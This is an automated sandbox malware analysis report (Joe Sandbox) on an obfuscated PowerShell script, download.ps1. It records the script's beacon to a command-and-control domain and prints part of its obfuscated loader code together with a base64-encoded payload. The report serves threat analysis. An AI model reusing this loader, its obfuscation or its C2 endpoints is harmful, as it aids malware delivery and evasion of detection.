Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579696
MD5:59908f67a71ad9340c677542cc600f9e
SHA1:1213cf8e1e34acd11a68e6b4c4f4ce97abe06901
SHA256:0fd9309ca77dbf0977bbfa58941ef51ed866d6e79f03e5ba89e31743b8627901
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 4640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4940, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4640, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4940, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4640, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 16%Perma Link
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB86000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb}a source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?id=$env:computername&key=$gqsylrwkvhi&s=527
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.2753530709.0000029A3F8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
Source: powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527p
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A2892F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BB37A960_2_00007FF88BB37A96
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BB388420_2_00007FF88BB38842
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BDA459D0_2_00007FF88BDA459D
Source: classification engineClassification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kkgfusk.lfa.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ezsadh724cyuq98.(([system.String]::new(@((4698-4631),(94+(-4977+(9514-(6894-2374)))),(-7336+7448),(1064800/8800),(-2056+2140),(-3844+(6916-2961))))))( $szl8g71o0ri2mnu ) $ezsadh724cyuq98.((-join (@((-2730+2797),(-7577+(-1895+(40935340/(23091292/5404)))),(88578/(1165878/1461)),(1669-1554),(956-855))| ForEach-Object { [char]$_ })))()$380do6izmun74vj.((-join (@((460893/(13262712/1928)),(9783-(11209-1534)),(5335-5224),(-5309+5424),(3807-3706))| ForEach-Object { [char]$_ })))()[byte[]] $ioy3gwv4625ncs7 = $szl8g71o0ri2mnu.((-join (@((5469-5385),(3005-(29455132/10178)),(-638+703),(714210/(716+(1863+3686))),(8405-8291),(1573-(-5430+(14372-(17597362/(3924405/(-7152+(1830+(6323235/905)))))))),(1494-(-2271+(5349392/1468))))| ForEach-Object { [char]$_ })))() $cwbzftra792duoj=$ioy3gwv4625ncs7 return $cwbzftra792duoj}[System.Text.Encoding]::ascii.(([system.String]::new(@((6543-(59781864/9237)),(7327-(73546228/(19139-8961))),(3346-(11198410/3467)),(41583/501),(-659+775),(-4892+5006),(710745/6769),(8704-(20144336/(1310296/(2176187/(27757090/(3694+(-2918+(16545-(81843921/8031))))))))),(7608-(5450+(18480615/(19190-(11913-1716)))))))))((vyqsxj5am76zg41binc9trw230h "J+JmMmMzbXc1ZZnq4+dz5RK1wjRxioQXCJ/whvmOo3A4ITZOSccMMZJ2Q3MQRZ1nAXshKG12J8XvWOsp7RIWJEYIH1db408BlzfF2FxnOJCifquuxwewTZvXg+q2+gnMQBmJ7KDcAqgNGk0I15C79/D0mukN2w4JQZyX/8wsMknLi9bdJ4YQQZjL8pBmjktLxYr9dSysMupum8Gc9rydVQSE4xhsgOKHsxJh3D9NnJKmmkJK7lOFaKg/CugvNpvLv0S74ppamSd3vrrH/D+55KQLjsCUqYLgBMNQAymdGGyYjJMv+1Ok5hyWUaFSr0FY/1UIPN62gK9q+Rnh1VGsIDDaCo3WttfsQkUlKCrkhQafoiguakOysLxXg+pbtjM9dGJx/dbCnBFO3qLogCAP91a+pxX2aVHrTSXVSoS1hkbXtWym2NqFg8StumXL1c9p7gbwbl8NkZY+Cedh9xcWRBbNhaFuyhpZJraRwND8c+iOXYYzUyXTHVLA+Di+VLiqOuZ9R6TGVSypDtBpgzZjAYlESNqU0Fg99NSJF9Col4ylstcs48WCfo1CDEbs2w2Pv6KEPR5a3WT6fY2ev7cJa5m/13Wqv3OvSp1Tu9r3SOFTWkBI944kgxBRjj1fLHuP4uhxvNKVX4ynp4TFkhXlAa96UoJozmI3MLHdgL8qmK9aeJVaTZbP9XOk89XzAYJM75SxEZeGfD1LxWIN27HnKWieVUx+Ww2cW8MbvrnBG7utqfbQzLdXhY4LNEcqpuENIbKGjBk8/kXp4Vc/W9lvzgZ4DqjvrREvB2KyvMYWz9zViWvsDY8LhPvffG2Q18Ji6rsphZuq0NBE0+KbUVpv/0nZCQKQwpmTVJ4mB+bqW8Gc2CpHX/aySpXRj53v5te7k6KJ1QQMEAXS+koMFXZh2ZpE6uxuuk2O1JWJ8SwEggjGibPxr0bQz53yqAXKFQiw8KTnLGFaBEquSBAVU8TijBKdqfyzGBzKW/HLpKLhpfan8/K34N+euzsKZ0kgb126ipyF/WxEQrjeGc+P2Y6Zn6sw19kSao9fI3FVw9cvVN05exAbuV8VgM62cF4CPoJmzAUqaOwf/gSbRuIvwB2iG9aRyVc7vZ8WN1mpoBg9ln6v2Ft9fmUuewkvUragN2BC/He5JqmHihSmfz8bq1IBMiZSfMrmfPJwlKXhDM+uoQxG+onpi9tpk8cq+raO3IKGnb00uAEaSfznWackq71tliXhvqKjvbQiuMsN1llC8Jvlm5DA0rkE00JJPNm3rZGhbrGNqjgVfs/0/YXjtXX3zNbkcvPO3s2SxurV7V6O0YTNoLtZh9bWT1dHkuh2ckvPw6SXj8jwjGplkvRiWmh87hf4SF7BIvoyRX8Wtv+7jp3Q+xLNpqJCEl+bIUWfGEK5Zt/N1deiSvEd0EfsRPTiMgmEd9BS/tbj2ATUSvk3eKBaIHTWs/yGW/sLtEL0WD+VYDOEtJ8XkAVdFrTveBtDOVoPkVygzphPrd+GpKUP8UmutwKJ1ZnJFfTMHJDv5kGptPZgtBNss4vupvsRXwZ+7qmChONpF23xyafJMP2STnIjIwSoMFxHF2Nh1qApeWZcPWXFs4R+oJ8VU2LPTQu4EkoWI2O9LAgj12d753FSCAQ4e3YjwG/iJCx+HeZtO70fmUsulAYHkxJ5X4EDrRRlzhV/Epl1VyZG1KGK7A8TYnR/52aKnKT3GyPgUJAYC9UHud5ebEIUhCpRuRUssHyY4YDCNIVfj+PqSgcBoIIo6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 16%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
